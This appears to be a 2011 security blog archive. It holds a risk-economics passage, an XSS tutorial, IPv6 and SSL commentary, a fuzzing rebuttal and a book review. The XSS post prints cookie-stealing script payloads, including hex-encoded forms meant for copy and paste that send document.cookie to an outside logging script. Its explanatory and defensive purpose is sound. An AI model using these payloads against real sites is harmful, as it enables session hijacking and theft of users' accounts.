It is rare to find that the quantification of an externality (the quantitative and qualitative effects on those parties affected by, but not directly involved in, a transaction) has occurred, despite this calculation forming an integral component of any risk strategy. The costs (negative) or benefits (positive) that apply to third parties are an oft-overlooked feature of economics and risk calculations. For instance, a network externality [2] attributes positive value to most organizations with little associated cost to themselves. In these calculations, the time-to-market and first-mover advantages are critical components of the overall economic function, with security playing both positive and negative roles at all stages of the process.

The processes that can enable the creation and release of actuarially sound threat-risk models that incorporate heterogeneous tendencies in variance across multidimensional determinants while maintaining parsimony already exist in rudimentary form. Extending these through a combination of heteroscedastic predictors (GARCH, ARIMA, etc.) coupled with non-parametric survival models will make these tools more robust. Further effort in the creation of models where the underlying hazard rate (rather than survival time) is a function of the independent variables (covariates) provides opportunities for the development of quantitative systems that aid in the development of derivative and insurance products designed to spread risk.
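As a minimal illustration of the hazard-based approach described here (not the proposed models themselves), a proportional-hazards form makes the hazard, rather than the survival time, a function of the covariates. All numbers below are illustrative.

```python
import math

def survival(t: float, baseline_hazard: float, covariate_effect: float) -> float:
    """Survival probability at time t under a constant hazard of the
    proportional-hazards form h = h0 * exp(beta'x).
    For a constant hazard, S(t) = exp(-h * t)."""
    h = baseline_hazard * math.exp(covariate_effect)
    return math.exp(-h * t)

# Illustrative only: a host whose covariates double its hazard has a
# correspondingly lower survival probability at every horizon.
print(survival(30, 0.02, 0.0))           # baseline hazard
print(survival(30, 0.02, math.log(2)))   # hazard doubled by the covariates
```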

In spreading the risk from outlier or black swan events, organizations can concentrate their efforts on obtaining the best return from their scarce resources. There are far more bunyips than black swans. If we expend excessive resources looking for bunyips and black swans, we will find these from time to time, but we will then miss the white swans. Focus on outlier risk incidents is unlikely to decrease the risk faced by an organization in mitigating the black swan event, whether a consequence of a zero-day vulnerability or a new form of attack. This approach will divert resources away from known risks and make these more likely. It lowers the level of security applied to an organization whilst still doing nothing to prevent the discovery of an unexpected platypus from time to time. Conversely, good security practice, which leads to the minimization of risk by stopping known events, makes black swan incidents less likely. Good risk and security practice as expressed against known issues also minimizes the impact of zero-day and other outlier incidents.
[1] Anderson. R. (2001) “Why information security is hard – an economic perspective”. In 17th Annual Computer Security Applications Conference, pp. 358–365.
[2] Arora, A., Nandkumar, A., & Telang, R. (2006). “Does information security attack frequency increase with vulnerability disclosure? An empirical analysis”. Information Systems Frontiers, (8:5), pp 350-362.
[3] Arora, A., Telang, R., & Xu, H. (2004). “Optimal policy for software vulnerability disclosure”. The 3rd annual workshop on economics and information security (WEIS04). University of Minnesota.
[4] Aycock, J. “Computer Viruses and Malware” Advances in Information Security, Vol. 22, Springer US
[5] Bednarski, Greg M. and Branson, Jake; Carnegie Mellon University; “Information Warfare: Understanding Network Threats through Honeypot Deployment”, March 2004
[6] Bradley, T. “Zero Day Exploits, Holy Grail Of The Malicious Hacker” Guide
[7] Campbell, K., Gordon, L. A., Loeb M. P. & Zhou. L. (2003) “The economic cost of publicly announced information security breaches: empirical evidence from the stock market”. In J. Comput. Secur. 11, 431.
[8] Carroll, L. (1871) “Through the Looking-Glass And What Alice Found There” Macmillan, USA
[9] Cohen, P. S. “Rational conduct and social life.” Rationality and the Social Sciences: Contributions to the Philosophy and Methodology of the Social Sciences 1976
[10] Devost, Matthew G. “Hackers as a National Resource”. In Information Warfare – Cyberterrorism: Protecting Your Personal Security in the Electronic Age, Winn Schwartau (Ed). Second Trade Paperback Edition. New York: Thunder’s Mouth Press, 1996.
[11] Fowler, C. A. & Nesbit, R. F. “Tactical Deception in Air-Land Warfare”. Journal of Electronic Defense, June 1995.
[12] Friedman, Milton. "The Methodology of Positive Economics." In his Essays in Positive Economics. Chicago and London: Chicago University Press, 1953.
[13] Gordon, S. & Ford, R. “Cyberterrorism?” Symantec Security Response White Paper 2002.
[14] Halderman, J. (2010) "To Strengthen Security, Change Developers' Incentives," IEEE Security and Privacy, vol. 8, no. 2, pp. 79-82.
[15] Honeynet Project & Research Alliance, “Know your Enemy: Trend Analysis”, 17th December 2004,
[16] Honeynet Project & Research Alliance, “Know Your Enemy: Honeynets in Universities - Deploying a Honeynet at an Academic Institution”, 26th April 2004,
[17] Honeynet Project & Research Alliance, “Know your Enemy: Tracking Botnets - Using honeynets to learn more about Bots”, 13th March 2005,
[18] Katz, M. L. & Shapiro. C. (1985) “Network externalities, competition, and compatibility”. In The American Economic Review 75, 424.
[19] Marti, K. (2008) "Computation of probabilities of survival/failure of technical, economic systems/structures by means of piecewise linearization of the performance function", Structural and Multidisciplinary Optimization, Vol35/3, Pp 225 - 244.
[20] Taleb, N. N. (2007) “The Black Swan: The Impact of the Highly Improbable”. Random House: New York.
[21] Ozment, A.& Schechter. S. E. (2006) Bootstrapping the adoption of internet security protocols. In Fifth Workshop on the Economics of Information Security.
[22] Ramesh Kumar Goplala Pillai, P. Ramakanth Kumar, "Simulation of Human Criminal Behavior Using Clustering Algorithm," iccima, vol. 4, pp.105-109, International Conference on Computational Intelligence and Multimedia Applications (ICCIMA 2007), 2007
[23] Roese, N. J., & Olson, J. M. (2007). “Better, stronger, faster: Self-serving judgment, affect regulation, and the optimal vigilance hypothesis”. Perspectives on Psychological Science, 2, 124-141.
[24] Shawgo, J., Whitney, N., & Faber S., “CIS Windows XP Professional Benchmark v.2.0.1”
[25] The SANS Institute, SANS Top 20, 2007,
[26] The SANS Institute, SANS “Top Cyber Security Risks”, The SANS Institute, “Survival Time History”, 2005, The Internet Storm Centre,
[27] Telang, R., & Wattal, S. (2005). “Impact of software vulnerability announcements on the market value of software vendors -an empirical investigation”. The 4th Annual Workshop on Economics of Information Security (WEIS05). Harvard University.
[28] Varian. H. (2004) “System reliability and free riding. In Economics of Information Security”, L. J. Camp, S. Lewis, eds. (Kluwer Academic Publishers,), vol. 12 of Advances in Information Security, pp. 1-15

[1] See the “Vulnerability testing in analog modem” thread on Security Basics (Securityfocus mailing list).
[2] Metcalfe’s law refers to the positive effect that can be related to the value of a network, which grows with the square of the network’s number of users.

Thursday, 22 September 2011

XSS – Cross Site Scripting

I am leaving this page up as a lesson to myself and to others. Back in 2008, when writing a book, I used some material from CGIsecurity. I emailed Robert Hansen (RSnake) for permission to use some material. He responded OK. I guess he thought I meant his material, as I also have a screen shot of his page.

What I did was mix up Robert Hansen and Robert Auger. 

A really dumb newbie mistake that should have been well behind me by that stage. The following is left on this page as I have used it without permission; not as a way of trying to steal another's ideas, but as an exercise in sloth. In place of checking the ownership of the sites correctly, I attributed both Roberts as one person.

I cannot excuse this, but I was rushed. Hence, this is a lesson in rushing. Trying to complete too much too quickly can lead to problems. I encourage you to learn from my mistake and to ensure that you always double check permission and sources when writing.

In general, cross-site scripting refers to a hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content to an end-user and collect some type of data from the victim.
Cross Site Scripting, AKA XSS, tricks the user into allowing their browser to execute code (well, it is automatic really). The browser treats the code as part of the legitimate website and runs it in the same context as that page. XSS attacks target the browser (user) and not the server.
An XSS attack comes in 4 parts:
  1. The client application which is fooled into running the code,
  2. The server which is used to send the code to the client,
  3. The attacker who seeks to gain by targeting the user, and
  4. The code the attacker seeks to run on the client.
And some of the common attacks include:

  • Displaying the page differently
  • Stealing Cookies
  • Phishing (redirection of traffic)
  • VPN (End-points) – Dan Kaminsky
  • Port scanning
Types of XSS include reflected and persistent (and a third type I am not covering today).
XSS reflection attacks are simple. Just add the following into a URL:
  • <script>alert(‘XSS’)</script>
Add the same to a POST to a site and the script is returned immediately on the page.
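A minimal sketch of the reflection in code (the page and function names here are hypothetical, and Python stands in for whatever the server actually runs): when the echoed value is not encoded, the payload above comes back as live markup; encoding it renders it inert.

```python
import html

def render_search_page(query: str, escape: bool = True) -> str:
    """Build a 'results for ...' page. With escape=False this reproduces
    the classic reflected-XSS bug: whatever arrives in the query string
    is echoed straight into the HTML and runs in the page's context."""
    shown = html.escape(query) if escape else query
    return f"<html><body>Results for: {shown}</body></html>"

payload = "<script>alert('XSS')</script>"
print(render_search_page(payload, escape=False))  # script would execute in the victim's browser
print(render_search_page(payload, escape=True))   # rendered as inert text
```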
Persistent XSS uses a web site’s posting features (message boards and the like) to store scripts that later run in users’ browsers. Commonly used to attack:
  • guest books,
  • classified ads, and
  • social networking
Basically it is an attack against anywhere that user posting is allowed and encouraged.
Cross-site scripting allows a web application to gather malicious data from a user and have another user run code. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will in most cases click on this link from another website, an instant message, or, commonly, spam. Typically the attacker will encode the malicious portion of the link in HEX (or another encoding method) so the request looks less suspicious to the user, making them more likely to click on it. After the data is collected by the web application, it generates an output page for the user that includes the malicious data initially sent to it, but in a manner that makes it appear as valid content from the original website.
Many programs allow users to submit posts with HTML and JavaScript embedded in them. If, for example, I were logged in as "admin" and read a message by "bill" that contained malicious JavaScript, then it may be possible for "bill" to hijack my session just through my reading the post. Another attack can be used to bring about "cookie theft".
There are a number of sites that offer easy Unicode translators.
Cookie-theft JavaScript examples.
An example from CGIsecurity:
http://host/a.php?variable="><script>document.location=' '%20+document.cookie</script>
HEX (truncated): %69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
NOTE: The request is first shown in ASCII, then in Hex for copy and paste purposes.
  1. "><script>document.location='' +document.cookie</script>
HEX: %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
  2. <script>document.location='' +document.cookie</script>
HEX: %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
  3. ><script>document.location='' +document.cookie</script>
HEX: %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
These are examples of malicious JavaScript. They gather the user's cookie and then send a request to a website with the cookie in the query string. My script logs each request and each cookie. In simple terms, it does the following:
My cookie = user=craig; id=0220
My script =
It sends a request to the site that looks like this.
GET /cgi-bin/cookie.cgi?user=craig;%20id=0220
(Note: %20 is a hex encoding for a space)
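The HEX forms above are produced by percent-encoding every byte of the payload (a normal URL encoder only escapes the unsafe characters, which is why the attack versions look so opaque). A short sketch of that transformation; the helper name is mine:

```python
from urllib.parse import unquote

def percent_encode_all(s: str) -> str:
    """Percent-encode every byte of the string, matching the style of the
    HEX payloads shown above."""
    return "".join(f"%{b:02x}" for b in s.encode("ascii"))

print(percent_encode_all("<script>"))       # %3c%73%63%72%69%70%74%3e
print(unquote("%3c%73%63%72%69%70%74%3e"))  # <script>
```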
Cookie Stealing Code Snippet:
document.location= ''+document.cookie
Non-Persistent Attack
Many web sites use a tailored page and greeting such as "Welcome, <username>". From time to time, the data referencing a logged-in user is stored within the query string of a URL and echoed to the screen. For instance:
In the example, the username "Craig" is stored in the URL, and the resulting web page displays a "Welcome, Craig" message. An attacker could modify the username field in the URL, inserting a cookie-stealing JavaScript. This would make it possible to gain control of the user's account.
Is a web server Vulnerable?
The most effective method to uncover these flaws on a web server is to perform a security review of the code and search for all places where input from an HTTP request could possibly make its way into the HTML output. Several different HTML tags can be used to transmit a malicious JavaScript.
Nessus, Nikto, and many other tools can scan a website for these flaws, but can only scratch the surface as there are many ways to check – more than a scanner can be expected to uncover. If one part of a website is vulnerable, there is a high likelihood that there are other problems as well.
XSS Protection:
Encoding user-supplied output can defeat XSS vulnerabilities by preventing inserted scripts from being transmitted to users in an executable form. Applications can gain significant protection from JavaScript-based attacks by converting the following characters in all generated output to the appropriate HTML entity encoding:
HTML entities (character, then encoding):
< &lt; or &#60;
> &gt; or &#62;
& &amp; or &#38;
" &quot; or &#34;
' &#39;
( &#40;
) &#41;
# &#35;
% &#37;
; &#59;
+ &#43;
- &#45;
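The table above can be applied mechanically on output. A sketch (the helper name is mine; Python's built-in html.escape covers only the first five rows, so the full map is written out):

```python
# Output-encoding map from the table above: each listed character is
# replaced with its HTML entity before being written into generated HTML.
ENTITIES = {
    "<": "&lt;", ">": "&gt;", "&": "&amp;", '"': "&quot;", "'": "&#39;",
    "(": "&#40;", ")": "&#41;", "#": "&#35;", "%": "&#37;",
    ";": "&#59;", "+": "&#43;", "-": "&#45;",
}

def encode_output(s: str) -> str:
    """Entity-encode user-supplied data for safe inclusion in HTML output."""
    return "".join(ENTITIES.get(ch, ch) for ch in s)

print(encode_output("<script>alert('XSS')</script>"))
```

Processing input character by character (rather than doing repeated string replaces) avoids double-encoding the `&` inside entities that were just emitted.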
Also, it's crucial to turn off HTTP TRACE support on all web servers.
XSS References

XSS (Cross Site Scripting) Cheat Sheet
One of (if not the) most effective and comprehensive XSS filter lists is the XSS (Cross Site Scripting) Cheat Sheet, which provides a simple web form that can calculate the encoded values for even the most novice attackers.
Figure 1 IP Obfuscation Calculator
Most of the checks in the OWASP 2.0 Guide – distilled into a web page.

Updated from “The IT Regulatory and Standards Compliance Handbook”. Permission was sought and obtained from Robert Hansen to use selected material here.

Wednesday, 21 September 2011

IPv6 and CGA

IPv6 incorporates the new concept of privacy-extended addresses. These are referred to as CGAs (cryptographically generated addresses) and have the goal of maintaining privacy whilst still providing a level of accountability and validation that can be configured by the link administrators.


A CGA [RFC3972] is an IPv6 address which is bound to the public key of the host, where the protection can work via either a certificate or local configuration. Manual keying is difficult, however, and is not recommended.


Using CGA, we can ensure that the sender of an NDP (Neighbour Discovery Protocol) message is the owner of the claimed address. Before claiming an address, each node generates a public-private key pair, and the CGA option verifies this key. This can be used to reduce the success of several existing NDP attacks.


The SEND (Secure Neighbour Discovery) protocol provisions also allow us to defend against many NDP attacks, but as yet SEND is not widely deployed.


In the most common configuration of CGA, 62 bits are used to store cryptographic hash of a public key. Here, the host ID = HASH62(public_key). We can see the inputs to the Hash in the diagram below.



The capability to embed a security parameter, "Sec", in the three leftmost bits of the 64-bit interface identifier allows the effective hash length to be increased in order to improve the security of the mechanism.


In this case, the CGA will have the 64 + 16 x Sec relevant hash bits equal the concatenation of 16 x Sec zero bits and the interface identifier. When comparing, the three Sec bits and the universal and group bits are ignored.
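The generation step can be sketched as follows. This is a deliberately simplified model of RFC 3972 (it omits the collision count, the modifier search, and the Sec > 0 hash-extension check; all simplifications and input values are mine):

```python
import hashlib

def cga_interface_id(public_key: bytes, modifier: bytes,
                     subnet_prefix: bytes, sec: int) -> bytes:
    """Derive a CGA-style 64-bit interface identifier (simplified).
    Hash1 is SHA-1 over (modifier | subnet prefix | public key); the
    leftmost 64 bits become the interface ID, with Sec written into the
    three leftmost bits and the universal/group bits zeroed."""
    hash1 = hashlib.sha1(modifier + subnet_prefix + public_key).digest()
    iid = bytearray(hash1[:8])
    iid[0] = (sec << 5) | (iid[0] & 0x1f)   # Sec in the three leftmost bits
    iid[0] &= 0xfc                          # clear the universal/local and group bits
    return bytes(iid)

# Hypothetical inputs: a placeholder key, a zero modifier, and 2001:db8::/64.
iid = cga_interface_id(b"example-rsa-public-key", b"\x00" * 16,
                       bytes.fromhex("20010db800000000"), sec=1)
print(iid.hex())
```

A verifier recomputes the same hash from the sender's public key and compares it against the claimed interface identifier, ignoring the Sec and u/g bits as described above.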


More to come…


About the Author:

Craig Wright is the VP of GICSR in Australia. He holds the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous postgraduate degrees, including an LLM specializing in international commercial law and e-commerce law and a Master's degree in mathematical statistics from Newcastle, and is working on his 4th IT-focused Master's degree (Masters in System Development) at Charles Sturt University, where he lectures subjects in a Master's degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk, at CSU.

Google's fuzzing

A response for

@CR, you have stated "Fuzzing tells you nothing about the security of the application".

You could not be more wrong. Fuzzing has dramatically reduced the number of code errors in many major software suites and can cover 80-90% of execution paths.

This is not 100%, but nothing ever is, not even formal verification.

Now, all software has an unknown but fixed number of vulnerabilities at a point in development. This number will change as patches and updates occur, but for each release there are a fixed number of existing vulnerabilities that start as unknown vulnerabilities and are then discovered.

We modelled this in the paper below:

"A Quantitative Analysis into the Economics of Correcting Software Bugs"
Craig S. Wright and Tanveer A. Zia

Basically, the more bugs you find early, the lower the cost of mitigating them. This leaves fewer holes to be exploited and increases the costs of exploiting them.

Security has no absolutes; the notion of an absolute is false in anything we can think of, and security is no different: it is only relative. This means it is a risk function. It comes down to economics and cost. Increasing the cost of exploiting software while reducing the vendor's cost of discovering and patching holes thus increases security.

@CR "It is less time consuming to do a careful failure analysis, than attempt random fuzzing."

I assume that you do not know what automation is?

Time costs for people, automation means we can fuzz faster than we can code review.

Also, there are many errors and omissions in any manual code review.
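To make the automation point concrete, here is a toy mutation fuzzer. Everything in it is illustrative (the parser, its deliberate bug, and the harness are mine, not Google's tooling): it mutates one byte of a valid input per round and tallies the exception types the parser throws.

```python
import random

def parse_record(data: bytes) -> int:
    """Toy parser under test: expects 'LEN:payload'. Deliberate bug:
    it trusts the declared length without checking the payload size."""
    head, _, payload = data.partition(b":")
    length = int(head)            # raises ValueError on junk headers
    return payload[length - 1]    # raises IndexError when the length lies

def fuzz(seed: bytes, rounds: int = 10_000) -> dict:
    """Minimal mutation fuzzer: flip one random byte of a valid seed
    input per round and count the exception types raised."""
    rng = random.Random(1)        # fixed seed for repeatability
    crashes: dict = {}
    for _ in range(rounds):
        mutated = bytearray(seed)
        mutated[rng.randrange(len(mutated))] = rng.randrange(256)
        try:
            parse_record(bytes(mutated))
        except Exception as exc:
            name = type(exc).__name__
            crashes[name] = crashes.get(name, 0) + 1
    return crashes

print(fuzz(b"5:hello"))
```

Even this crude harness finds both failure modes in seconds, without anyone reading the parser's code; coverage-guided fuzzers simply do this at scale with smarter mutation choices.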

As for @Adobe, they suck as they do not do this; @Google had to do it for them.

As for Apple, they have just as many errors as Microsoft per SLOC, just fewer users.

Tuesday, 20 September 2011

IPv6 - The death of SSL

We see many sites moving more and more to application level encryption such that they can protect the transport of sensitive data. 

IPv6 is THE killer application for SSL. Not that SSL needs help, it is flawed.

IPv6 provides support for encryption within the protocol. This is a key differentiator when we compare it to IPv4, where encryption was provided by the application. IPSec can be used with IPv4; that said, IPSec is tacked onto IPv4, whereas it is fundamental to IPv6. The standards require mandatory IPSec support (with all the associated crypto code); it is not just an add-on. IPv6 requires crypto.

On top of that, endpoint authentication is also provided in IPv6, something that was overlooked in IPv4.

IPv6 does not come even close to solving all the world’s security woes, and nor could a simple protocol ever attempt to do so. That said, all it needs to do to kill off SSL is to:

  1. Be as effective as SSL or better,
  2. Have a wide deployment.
IPv6 will provide the latter point. When IPv6 finally becomes the norm, IPSec will become ubiquitous, deployed far wider than SSL ever was. Next, it simplifies things for developers. Crypto is difficult, and developers make mistakes again and again in implementing it. The centralised control and deployment of network crypto is a good thing.

As for being as good or better than SSL, well SSL is flawed. It was from the start and it remains flawed. This point is moot as it would be difficult to make the protocol worse.

IPSec allows the application to call for authentication separate from encryption, for use in situations where encryption is prohibited or prohibitively expensive. That is, AH headers can provide integrity and end-point authentication without the overhead of encryption.

For most machines, Intel's decision to incorporate AES processing into the CPU will greatly alleviate the costs of encryption. This will not of course completely remove the CPU costs from large e-commerce websites, but it will make it simpler for the user of such a site.

Next, SSL will have a particularly difficult time with many of the extensions that IPv6 is introducing. The new privacy-extended IPv6 addresses generated as CGAs (cryptographically generated addresses) will:
  • maintain privacy
  • add accountability for link administrators
IPv6 will even add a Host ID that can be used as a token for access to a network. The big issue is that we will expect multiple addresses per node, so “Who needs spoofing?”

The combination of multiple IP addresses and CGA makes for a difficult time for existing implementations of SSL. We could try to fix SSL, but the question is simply: why?
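To see why CGAs cause SSL trouble, it helps to see what one is. A simplified sketch of the RFC 3972 construction follows; a real implementation hashes a DER-encoded public key and, for sec > 0, also computes a second hash with a leading-zero requirement:

```python
import hashlib

def cga_interface_id(modifier: bytes, prefix: bytes, collisions: int,
                     pubkey: bytes, sec: int = 0) -> bytes:
    # The interface ID is the first 64 bits of a hash that binds the
    # address to the owner's public key.
    digest = hashlib.sha1(modifier + prefix + bytes([collisions]) + pubkey).digest()
    iid = bytearray(digest[:8])
    iid[0] = (iid[0] & 0x1F) | (sec << 5)  # encode the sec parameter in the top 3 bits
    iid[0] &= 0xFC                          # clear the u and g bits
    return bytes(iid)

# Hypothetical inputs for illustration only.
iid = cga_interface_id(modifier=b"\x00" * 16,
                       prefix=b"\x20\x01\x0d\xb8\x00\x00\x00\x00",
                       collisions=0, pubkey=b"example-public-key", sec=1)
```

The owner can later prove possession of the matching private key, so the address itself authenticates the host with no certificate authority involved.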

IPv6 has encryption built in. The IPv6 Security Protocols include:
  • Authentication Header (AH) [RFC4302] and
  • Encapsulating Security Payload (ESP) [RFC4303].
These work through Security Associations (SAs). What an SA is, how SAs work, how they are managed and the associated processing are all defined in [RFC4301].

The death knell for SSL really comes as the algorithms for authentication and encryption in IPv6 are defined as mandatory. These algorithms are defined for use with AH and ESP in [RFC4835] and for IKEv2 in [RFC4307]. Basically, IPv6 already incorporates a tunnelling and transport encryption protocol that has to be deployed. Why run SSL on top of IPSec?
AH provides:
  • Integrity.
  • Data origin authentication.
  • Optional (at the discretion of the receiver) anti-replay features.
IPSec implementations MUST support ESP and MAY support AH.

ESP provides:
  • Integrity.
  • Data origin authentication.
  • Optional (at the discretion of the receiver) anti-replay features.
  • Confidentiality (NOT recommended without integrity).
On top of this, each IPSec implementation maintains a nominal Security Association Database (SAD). An SA contains much more than I have included below, but this covers some of what is necessary for this post:
  • Each entry defines the parameters associated with one SA.
  • Each SA has an entry in the SAD.
  • The SPD has pointers to SAD entries where IPSec has to be used (PROTECT).
  • Anti-Replay Window: A 64-bit counter and a bit-map (or equivalent) used to determine whether an inbound AH or ESP packet is a replay.
  • AH Information: authentication algorithms, keys, lifetimes, etc.
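The anti-replay window in that list is worth seeing concretely. A minimal sketch of the RFC 4301 sliding-window check, one instance per SA (a real implementation tracks this alongside the rest of the SAD entry):

```python
class ReplayWindow:
    # A sliding window over the highest sequence numbers seen on one SA.
    SIZE = 64

    def __init__(self) -> None:
        self.top = 0       # highest sequence number accepted so far
        self.bitmap = 0    # bit i set means (top - i) has been seen

    def check_and_update(self, seq: int) -> bool:
        if seq == 0:
            return False                   # ESP/AH sequence numbers start at 1
        if seq > self.top:                 # new highest: slide the window forward
            shift = seq - self.top
            self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.SIZE) - 1)
            self.top = seq
            return True
        offset = self.top - seq
        if offset >= self.SIZE:            # older than the window: reject
            return False
        if self.bitmap >> offset & 1:      # already seen: a replay
            return False
        self.bitmap |= 1 << offset
        return True
```

Out-of-order packets inside the window are accepted once; anything replayed, or older than 64 packets, is dropped.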

Now, consider as well that [RFC4941] describes an extension to IPv6 stateless address auto-configuration that allows nodes to generate global-scope addresses that change over time. We have multiple addresses per host, and they move, update and change. The concern the standard addresses is that, without it:
  • the IPv6 addresses on a given interface generated via stateless auto-configuration contain the same interface ID,
  • this occurs regardless of where within the Internet the device connects, and
  • it facilitates the tracking of individual devices.
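The mitigation in [RFC4941] is to derive short-lived interface IDs from a hash chain rather than from the hardware. A simplified sketch; the RFC specifies MD5 over a stored history value and the stable interface ID:

```python
import hashlib

def next_temporary_iid(history: bytes, stable_iid: bytes) -> tuple[bytes, bytes]:
    # Left 64 bits of the digest become the new temporary interface ID;
    # right 64 bits are stored as the next history value.
    digest = hashlib.md5(history + stable_iid).digest()
    iid = bytearray(digest[:8])
    iid[0] &= 0xFD  # clear the universal/local bit: locally generated
    return bytes(iid), digest[8:]
```

Each regeneration yields an unrelated-looking address. That is exactly what defeats long-term tracking, and it also defeats address-based scanning and any SSL-style pinning of a host to one address.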
Again, why would we bother with SSL?
Once a business sees that it has encryption and authentication services at the end-point and at layer three, to and from host and server, it will not bother with the notion of application-layer security. As such, SSL will become redundant.

Why would a business run both a secure and an open web site? Why would it implement separate controls for email, the web, file sharing and every other application it runs?

No, simply put, SSL is flawed, and at least we can foresee its slow death as the uptake of IPv6 replaces the existing IP stacks host by host.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous postgraduate degrees, including an LLM specializing in international commercial law and e-commerce law and a Masters degree in mathematical statistics from Newcastle, and is working on his fourth IT-focused Masters degree (Masters in System Development) at Charles Sturt University, where he lectures in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk, at CSU.

“Network Forensics”: A Review

I have had the good fortune to have been asked to proof and review a forthcoming book by Sherri Davidoff and Jonathan Ham titled Network Forensics. I say good fortune, as this is one of the best forensics books I have read, and I have read more than a few. What is more, this has to be the most comprehensive network forensic tome available.

This book is clear and well written and constructed with many excellent interludes and examples dispersed throughout.

The authors take the reader on a journey through the network layers, building a deep comprehension of this at-times difficult topic. I have to say, this is THE reference volume for anybody involved in incident handling and digital forensics. As we move away from isolated systems and disk-based analysis of compromised hosts into the interconnectivity of the cloud, Sherri and Jonathan have created a framework and roadmap that will act as a seminal work in this developing field.

The book starts with an easily comprehended introduction to networking and networked systems, and takes the reader on a journey through the protocols before arriving at its destination: imparting an incredible body of knowledge concerning the analysis of network-based attacks and incidents. The quantity of information provided is outstanding, whilst the text still manages to remain clear and unambiguous. This book has everything the aspiring network forensic professional needs to know.

This is a must-have work for anybody in information security, digital forensics or incident handling. It is not simply a reference; it is a methodology. As the authors state, “a well-trained forensic investigator should be familiar with a variety of tools and techniques”. Not only do they show you the value of the various tools, they create a framework that instructs the reader on when to use them.
The best compliment I can give them is that I will be using their book as the foundational text in creating a Masters-level course in network forensics to complement the existing Masters degree in digital forensics that we offer at Charles Sturt University.

Monday, 19 September 2011

IPv6–the end of security as we know it.

Many people have seen IPv6 as a simple addressing extension to the existing Internet and see few changes to the way we secure systems. These people could not be further from the truth. IPv6 will change the way we think about security. We need to start planning now or we will be left in the dust.
This is another topic I will be addressing in the coming weeks and months (so many security topics, so little time).

IPv6 substantially changes how IP interacts with the link layer, in particular Ethernet. ARP goes away, replaced by NDP, which is ICMPv6-based, and we also need to look to protocols such as SEND to secure NDP, or we will fall prey to the same class of attacks we faced in IPv4 over shared hub networks (and, for that matter, now in the world of wireless).

I will explain what SEND and NDP are in the next couple of posts this week. For now, I ask you to trust me when I say they are important.

First, I will discuss a couple issues that we really need to start planning for. IPv6 has been around for a long time (15 plus years is a long time in IT), but it is only just starting to be widely deployed. The issues we will face need to be addressed now or we will discover holes in our networks and systems and these will be exploited before we even note that they are a concern.

Many of the issues in security and risk are really about managing problems before they grow too large. IPv6 is just this: a potential issue as well as a potential benefit. How we manage it determines the outcome.

IPv6 Improvements
There are many improvements in IPv6 compared with IPv4. Some of the commonly noted ones include:

  • Expanded address space.
  • Extended routing (more levels of addressing hierarchy, simple auto-configuration of addresses).
  • Improved scalability of multicast routing.
  • Simplified header (fewer header fields than IPv4 to lower processing costs; dropped header fields are now available as optional extension headers).
  • Support for optional extension headers (allows for faster processing because extension headers are not examined by routers, allows for arbitrary length of IPv6 header).
  • Support for authentication and privacy through encryption.
  • Support for source routes (Source Demand Routing Protocol (SDRP)).
  • Quality of service capabilities.
There are also some less commonly discussed security enhancements that we will cover in the forthcoming posts:
  • New privacy-extension IPv6 addresses generated as CGAs (cryptographically generated addresses), which:
  1. maintain privacy, and
  2. allow accountability by link administrators.
  • New: a Host ID can be used as a token for access to a network.
For today, we will discuss a couple of topics that many people have overlooked.

IPv6 and Scanning
The new addressing scheme being implemented with IPv6 implies that the number of available and allocated addresses is REALLY big. So big that the existing methods of brute-force/random scanning make no sense [RFC5157].

There are ways to discover hosts, but they are no longer based on random scanning.
The typical IPv6 network is issued a /64 prefix. This is why scanning is, in practice, much less feasible. Automated attacks, e.g. network worms that pick random host addresses to propagate to, are also going to be hampered. When there are 1.84 x 10^19 (1.8 with 19 zeros) host addresses, finding a host in a single IPv6 subnet is over four billion times more difficult than scanning the entire deployed IPv4 Internet!

Worse, even if we could, it would quickly end in either a DDoS or detection.
From this, we can see that random-scanning network worms will not be feasible. They have been disappearing in any event, but IPv6 spells the end of the random scanning worm.

In IPv6, every subnet is much larger. As noted, default subnets in IPv6 have 2^64 addresses. An exhaustive scan of every address on a subnet is no longer reasonable (at 1,000,000 addresses per second it would take more than 500,000 years), and even NMAP support for IPv6 network scanning is limited.
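The arithmetic behind that 500,000-year figure is straightforward:

```python
# Back-of-the-envelope cost of an exhaustive scan of one default subnet.
hosts_per_subnet = 2 ** 64            # a /64 prefix leaves 64 bits of host space
rate = 1_000_000                      # probes per second, a generous assumption
seconds = hosts_per_subnet / rate
years = seconds / (60 * 60 * 24 * 365)
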